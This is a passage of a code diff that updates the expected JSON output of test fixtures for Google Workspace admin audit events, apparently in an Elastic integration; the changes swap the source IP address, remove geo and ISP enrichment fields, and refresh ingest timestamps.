- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005029900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "MAIL_ROUTING_DESTINATION_ADDED",
 "id": "1",
@@ -3271,7 +2605,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3295,35 +2629,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301296Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005038500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "MAIL_ROUTING_DESTINATION_REMOVED",
 "id": "1",
@@ -3360,7 +2676,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3384,35 +2700,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301297700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005044100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
 "provider": "admin",
 "action": "ADD_NICKNAME",
 "id": "1",
@@ -3449,7 +2747,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3473,35 +2771,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301299300Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005049600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}",
 "provider": "admin",
 "action": "REMOVE_NICKNAME",
 "id": "1",
@@ -3538,7 +2818,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3562,35 +2842,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301301Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005054900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "CHANGE_PASSWORD",
 "id": "1",
@@ -3627,7 +2889,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3651,35 +2913,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301302700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005060200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_PASSWORD_ON_NEXT_LOGIN",
 "id": "1",
@@ -3715,7 +2959,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3734,35 +2978,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301304400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}",
+ "ingested": "2021-12-09T13:38:57.005065600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}",
 "provider": "admin",
 "action": "DOWNLOAD_PENDING_INVITES_LIST",
 "id": "1",
@@ -3793,7 +3019,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3817,35 +3043,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301306100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005069500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "REMOVE_RECOVERY_EMAIL",
 "id": "1",
@@ -3882,7 +3090,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3906,35 +3114,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301307800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005074500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_RECOVERY_PHONE", "id": "1", @@ -3971,7 +3161,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -3995,35 +3185,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301309600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005079300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REQUEST_ACCOUNT_INFO", "id": "1", @@ -4060,7 +3232,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4084,35 +3256,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301311300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:57.005084800Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "REQUEST_MAILBOX_DUMP", "id": "1", @@ -4148,7 +3302,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4172,35 +3326,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301313Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005088500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESEND_USER_INVITE", "id": "1", @@ -4232,7 +3368,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4256,35 +3392,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301314700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005092900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESET_SIGNIN_COOKIES", "id": "1", @@ -4321,7 +3439,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4345,35 +3463,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301316300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005096800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "SECURITY_KEY_REGISTERED_FOR_USER", "id": "1", @@ -4410,7 +3510,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4434,35 +3534,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301318200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005100700Z", + "original": 